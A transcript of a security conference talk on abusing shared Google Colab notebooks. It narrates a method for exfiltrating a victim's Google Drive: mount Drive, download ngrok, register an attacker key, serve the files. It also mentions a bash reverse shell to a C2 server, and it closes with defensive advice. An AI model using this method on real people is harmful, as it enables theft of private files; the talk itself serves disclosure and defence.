Let me... I will introduce Antonio. I'd like to welcome to the stage Antonio Piazza, who's going to present Careful Who You Collab With, Abusing Google Collaboratory. Antonio Piazza, hailing from Cleveland, Ohio, USA, is a Purple Team Leader and Offensive Security Engineer at NVIDIA. Following his stint as a U.S. Army Human Intelligence Collector, you and I should talk after your talk. He worked as a Defense Contractor Operator on an NSA Red Team, so he's intimately familiar with spies, hacking, and nerd stuff. Antonio is passionate about all things related to macOS security and hacking, thus spends his days researching macOS internals and security, as well as writing free open-source Red Team tools for use in the defense against the dark arts. Oh, that's... I... that sounds cool. As of late, he has been planning to implement machine learning into Red Teaming with his NVIDIA colleagues. So, please welcome Antonio. Sorry, I have to give you access, I guess. Oh, I see. Sorry. I was looking for your handle. There we go. Okay, you have access. All right. Make sure to pick up a microphone to get megaphone access. Just point your pointer at one of the microphones, and it'll change from a circle to a funny-looking icon, and then left-click to pick it up. Is that right? Left-click, I don't know why my icon's not changing. He has megaphone enabled, so he's good. Okay, yeah, I can learn how to use these controls. That'd be wonderful. Okay, thanks everyone. I really appreciate you coming and listening to this. Can everyone hear me okay before I start going on? This is my first formal doing anything in VR, so hopefully it goes well. I'm going to be looking at my slides a lot, so yell at me if something happens. So anyway, when I started this research, I was toying around with the idea of creating a startup that would provide a service to artists that would allow them to gain inspiration through AI. That was kind of the premise of the startup idea I had. And I wanted to start with music, because that's where my passion is. The idea was that a musician who needs inspiration for writing their next song could submit some samples of their music, or of songs from which they wish to emulate, or they gain inspiration from. And the AI would then throw together a bunch of riffs similar to, but not the same, as the style that the user submitted. I started using Google Collaborator and getting involved in the AI art music community, including the Databots Discord channel, and reading white papers concerning sample RNN. Not having a great GPU on my own computer at the time, and they were super expensive and hard to get. Not anymore, thanks to me working at NVIDIA. Some AI researchers in the community directed me to Google Collaboratory. So I started playing with it and found it to be a great tool for AI collaboration, and you get a free GPU, which is really nice. So this research didn't start with anything to do with security. Next slide, please. Then a researcher in the Databots Discord, who was involved in another project called OpenAI Jukebox. This platform allows the user to train the AI by feeding it a song or whatever, and the AI will give you, in return, a song where the artist sings the lyrics he provides. So I was playing around and trying to get Elvis to sing the lyrics of Sir Michelot's Baby Got Back in the style of Suspicious Minds. Next slide, please. And a researcher, Brockaloo, from the AI Jukebox research project helped me out by tweaking some of the configurations in my Google Cloud file, which he shared with me via this Discord message. I opened the file in Colab as normal, and again, as normal, I began the process of mounting my Google Drive in Colab. And this is when it hit me. When I mounted my Google Drive, this prompt came up on the screen, and it said, I don't know if you can read it, but it says, this notebook is requesting access to your Google Drive files. Your access to Google Drive will permit code executed in the notebook to modify files in your Google Drive. Make sure to review notebook code prior to allowing the access. And that's where security research began for this. So next slide, please. And again, the talk is titled, Careful Who You Colab With Abusing Google Collaboratory. Next slide, please. And I am Antonio Piazza. I go by Antman1P on the Twitters. I'm an offensive security engineer. Most of my security experience is strictly red teaming. I've worked at Zoom, Box, the Cleveland Clinic, on an NSA red team as a defense contractor. And now I am the purple team leader at NVIDIA on the threat operations team. And that ODIN logo down there, some stickers. If you're here at DEF CON, I'm here. I'll be down in the AI village after this talk, and I'll hand them out if you want some. I'm also in my final course of the Master's of Science in Information Security Engineering Program at SANS Technology Institute. I'm a father of five, a husband, and again, I love music. Next slide, please. So the agenda here, we're just going to be pretty brief. We're going to discuss what Google Collaboratory is, because I'm sure some of you don't know. Some of you might be familiar. We're going to talk about how we can abuse Google Collab, and then we're just going to kind of conclude. Next slide, please. So what is Google Collaboratory? I'll let Google define it, because I think they best describe it in detail. Collaboratory, or Collab for short, is a product from Google Research. Collab allows anybody to write and execute arbitrary Python code through the browser, and is especially well-suited to machine learning, data analysts, and education. More technically, Collab is a hosted Jupyter Notebook service that requires no setup to use, while providing access free of charge to computing resources, including GPUs. Collab resources are not guaranteed and not unlimited, and the usage limits sometimes fluctuate. So you actually, if you're interested in having reliable access and better resources, you could purchase Collab Pro, which is, I think, about $50 a month. Um, what is the difference between Jupyter and Collab? Jupyter is an open source project in which Collab is based. Collab allows you to use and share Jupyter Notebooks with others without having to download and install or run anything. So that's the example I gave of, you know, Broccoli sharing a Collab file with me. He was actually sharing a Jupyter Notebook file. Next slide, please. How is Collab normally used? You can write your own notebooks, which are stored in your Google account, Google Drive. Basically, you write Python code in a Jupyter Notebook cell, and you execute the cells by pushing the execute button. When you open or start a notebook, you connect it to a Collab runtime, and that's where you get your GPU and other resources. Spin up and start running, and you also may connect your notebook to your Google Drive. So in the slide here, the picture, I got arrows from a Jupyter cell, and you can see the little black play button, which is how you run a cell, and then on the upper right-hand corner, just showing you your resources usage for your runtime. Next slide, please. How is Collab normally used? Kind of continuing, you can import Python libraries, just as you could normally do in Python. You can install dependencies with pip, and you can clone Git repos all into these Jupyter Notebook cells. Next slide, please. You also have a Collab terminal. Once connected to the Collab runtime, you have a terminal that you can use to run shell commands, and once connected to Drive, you can navigate the connected Google Drive file system. A question, where is my code executed? What happens to my execution state if I close the browser window? The code is executed in a virtual machine private to your account. Virtual machines are deleted, when idle for a while, and have a minimum lifetime enforced by the Collab service. I don't, I haven't sat and tried to figure out what that time is, but that's something I'll probably do in the future. It seems to last a while, as long as you're active. Next slide, please. Finally, I want to touch on system aliases. So Jupyter has a number of system aliases, or basically command shortcuts, to common operations such as ls, cat, ps, kill, so just your normal, you know, Nix built-in commands. You can execute these from the Jupyter Notebook cell by adding the bang, the exclamation point before the command, so bang ls will run the ls command. Next slide, please. All right, so how is this abusable? Let's recap. If I'm an adversary and I share a Collab file with someone, a Jupyter Notebook with someone, if they choose to use my file, they must mount their Google Drive and execute it. So that's key, right? They would be executing the malicious code I sent them. The adversary could potentially access all of the contents of a victim's Google Drive and exfiltrate anything they choose at that point. The adversary could edit the victim's Collab files to create backdoors that might still exploit other users that the victim collaborates with. Can have a reverse shell on a Collab virtual machine in the runtime we're talking about. Is there a possibility to do a VM escape? Maybe. All this could be as simple as sending a phishing email with a link to a malicious Collab file or sending a link to a malicious Collab file in an AI community Discord server, just like the ones I hang out in and kind of the way that Broccoli shared the file. I got to say, the one he shared with me was not malicious, by the way. I scared him when he saw these slides. He thought, like, oh, my God, did I send you something malicious? I'm like, no, no, no, that just got my brain working like an adversary. So you can hide malicious code in Jupyter shells. You can hide it in Git repos since you can clone Git repos into a Jupyter notebook. So there's a number of ways. Next slide, please. So for a clear understanding of what an attacker might have access to, they successfully gain access to a victim's Collab runtime or their Google Drive. Here are the permissions that one grants when mounting a Google Drive for a Collab session. If you're having a hard time seeing these, I can read them real quick. But it's like see, edit, create, delete all of your Google Drive files. View the photos, videos, albums in your Google Photos. Retrieve mobile client configuration and experimentation. View Google people information, such as profiles and contacts or basically all the contacts you have in your Google account, including your phone or your Gmail. See, edit, create, and delete any of your Google Drive documents. Next slide, please. To see what an attacker might do, we can take a look at MITRE ATLAS. So ATLAS stands for Adversarial Threat Landscape for Artificial Intelligence Systems. It's a knowledge base of adversary tactics, techniques, and case studies in learning systems based on real-world observations, demonstrations from machine learning red teams and security groups, and the state of what's possible from academic research. ATLAS is basically modified after the MITRE ATT&CK framework, which people are commonly more familiar with. And its tactics and techniques are complementary to those in MITRE ATT&CK. So how can an attacker do this? Well, for initial access, we discussed phishing the AI community or ML research community via email or Discord servers. MITRE ATLAS has a machine learning supply chain compromise technique under the initial access tactic. That might make sense. So maybe we can add a sub-technique there for Jupyter Notebook sharing. Also, user execution under the execution tactic. So an attacker might hide a backdoor in a Jupyter cell or maybe hide a backdoor in a Git repo that the notebook clones. Next slide, please. This is an example here of hiding malicious code in Jupyter Notebook cells. Here is code on the left that will give an adversary access to the victim's Google Drive. While an adversary shared this notebook, a victim might easily recognize that this is not AI ML. This one on the left is just all for an adversary getting access to Google Drive. But some of the AI and ML notebooks are quite large. As you can see on the right, that's not even the whole thing. And I zoomed out as far as possible to take that screenshot. An adversary might be able to hide the malicious bits within normal machine learning code. So the image on the right is just one small piece from a collab project with an AI community member that an AI community member shared with me. Nothing malicious in there, just an example of how much code there is that an adversary could hide malicious cells and malicious code in. Next slide, please. Okay, so this is the example of the malicious code by the numbers, right? So imagine you receive a link to a collab file and you open it. If you run all of this, you will give the sender access to all your files via Google Drive, via ngrok. So the first thing you do in the code is for the victim is going to mount their Google Drive. And again, this is normal behavior for all collab files, right? Like in order to kind of persist and store the data created from running one of these, you have to store it somewhere. And when you're in the cloud, you're going to mount or you're going to store it. The next step, you're going to wget ngrok tarball and untar it. The third step is you're going to register your attacker ngrok API key. So it's a bit dangerous for an attacker to, I guess, hard code API key, but an attacker can always change it when they're done pillaging, or if they're unsuccessful with the attack. So it's not too bad. Step four is start a Python server on a specified port. So like 9999 in this case, and then run ngrok on the same port in step five. Next slide, please. So this is a video demo. I don't know, were you able to run the videos from this presentation? I don't know if that problem was solved or... I don't know if anybody can hear me. It should be running right now. Oh, it's running. Okay. I can't see it, but I'll just go ahead. So the victim, again, will run the cloud file, mount their drive. So you can see, but off screen, I'm picking up, or picking my Gmail account and allowing the drive access, as I showed in the image earlier. And now I could navigate the file system on the left, on the left, if I wanted. So installing Python requests, don't really need it here, but I want to show how you can use PIP if needed. I do a PWD to show the or the correct location of the Google Drive file system. And then I curl ifconfig.me to show my Cloud VM IP address. Wget to download ngrok, tar to untar ngrok, run ngrok, config to add my API key, run the Python server to serve the Google Drive root directory, run ngrok. And then on the attacker side, the attacker goes to the ngrok agents. Is there a way to, like, tilt my view so I can look up and see the slides? I'm, like, looking down. Yes, move your mouse forward. Oh, there it is. Okay. Oh, did something go wrong? Oh, no. No, no, you're okay. I think I'll just kind of... So on the attacker side, the attacker goes to ngrok agents. And you might have saw there the IP address of the agent matched what I got from the curling of ifconfig.me. And then we're in. So we can navigate the Google Drive system, download whatever we want from the victim. So that what you're seeing there is kind of like an upper browser, in-browser representation of the victim's Google Drive. Next slide, please. Okay, so that was the example of being able to get into a victim's Google Drive. And this one is a reverse shell example. It's really, it's two simple steps for this one. So basically, mount the victim Google Drive, and then do a bash TCP reverse shell to the adversary C2 server IP address. And I didn't show a video for this because it's just so simple. But you get the idea of what a reverse shell is going to look like. Next slide, please. Okay, so knowing all this, you know, what is the problem? So quickly, GPUs are a little harder to find. Supply chain issues. They're pretty expensive. Where Collab is free and even Pro is cheap. AI and ML researchers are starting to use Collab more, especially education sectors and universities are using something similar like these cloud-based Jupyter Notebooks, runtime environments. And researchers are collaborating and sharing, right? This is a pretty exciting time where we're able to, you know, someone like me, who's not super schooled in AI and ML can get their start because there's just so many cool, you know, so much cool research going on there and people are willing to share it and get to learn how to do all the crazy cool AI stuff. Where I think the problem comes in is that most AI and ML researchers and developers are not security experts, right? So it's kind of like at the beginning of software engineering, like nobody's really thinking about security. It took a while for that to change and we're kind of back like at square one with that, I think, with AI and ML researchers. The good news is security has been, you know, around for a while and we kind of saw the mistakes that were being made at the beginning, you know, with software engineering. So hopefully we can quickly jump in and start, you know, securing things in the machine learning and AI sector. And finally, phishing is easy, right? I've been on a lot of red teams and, you know, it's a numbers game. If I send out 100 phish, I know I'm going to get at least one, as long as they all make it through, you know, your email filtering. That's never really been a problem. So, and it's scary. How can we fix it? Well, ML researchers and people who are collaborating should read the code someone shares with them. Let that Google Drive mount warning remind you every time, like, oh, before I mount this, let me look through and make sure this code is good. And it's what I was expecting and nothing weird in there. And I know that's difficult, because again, in that example, that could be in one of these, you know, notebooks, it might be difficult to find those needle and haystack. And especially if the researcher doesn't know what to look for. So, you know, that's one thing I think, as security experts, we should probably start educating machine learning and AI researchers in what bad looks like, right? So, this is me, I'm hopefully getting something out, you know, to the security community. And hopefully, this will spread from the security community into the ML research and AI community and start using your expertise to educate those folks on what bad looks like. So then they can search for that in their notebooks. Maybe develop a code sharing plugin, you know, in Google Drive. Maybe Google can do that or the open source community can do that. Next slide, please. With that, thanks again. This is really cool doing something for the first time in VR. Hopefully, it went smoothly for everyone else. And again, I hope you got something out of this. And please feel free to ask any questions. I know I'm probably out of time here, but hopefully I can answer some questions. Do you think this problem should be fixed by Google or do you think it should be up to the user basically to kind of watch themselves to make sure they don't download any malicious code? You know, it's funny because I've heard that question before. Basically, is this a problem that the users need to solve? Well, absolutely. But, you know, if you think about it, security education has been trying to push the responsibility on the user, which ultimately it is in the end. But is that working? Are users listening? And especially if you're securing an enterprise or a corporate network or something, we would hope all the users would do diligence, but it just never turns out that way, right? I would love if every person would be super diligent when opening an email and not clicking on a link, right? But it just never happens. So, yeah, I mean, I think it's always an end user responsibility. But ultimately, I think, you know, we have to do our part as well as, you know, security experts. Should Google do anything? In my opinion, they should have more than just that warning. But, you know, I've submitted several things to Google. I don't know. I don't try to pick on Google, but I use Google a lot. So I end up finding things. I've submitted things and, you know, they're just like, oh, that works as normal. And I'm like, that doesn't seem like great security practice. But no, that's the response. So I don't have an expectation that Google will do anything. I wish they would. But, you know, I think ultimately, we're going to have to rely on the open source community to develop some plugins or, again, help educate people. Next slide, please. I actually have one more slide. Sometimes I get... it's not really a question, but people want to hear the maybe got back thing with Elvis. I can play it if you want. Well, I don't know if that went as smoothly as I hoped, but it's a work in progress. But it gets pretty crazy when the end, the AI starts singing in some alien language. It reminds me of this show, Devs, when they had that background weird noise of the quantum computer speaking. It's kind of spooky. But anyway, any other questions? All right. Well, thanks a lot. Again, I really appreciate it. Thank you, Antonio, for your presentation. I have to be careful, I guess, who we collab with from here on out. I never thought of that Jupyter Notebooks being used in that way. That's quite clever.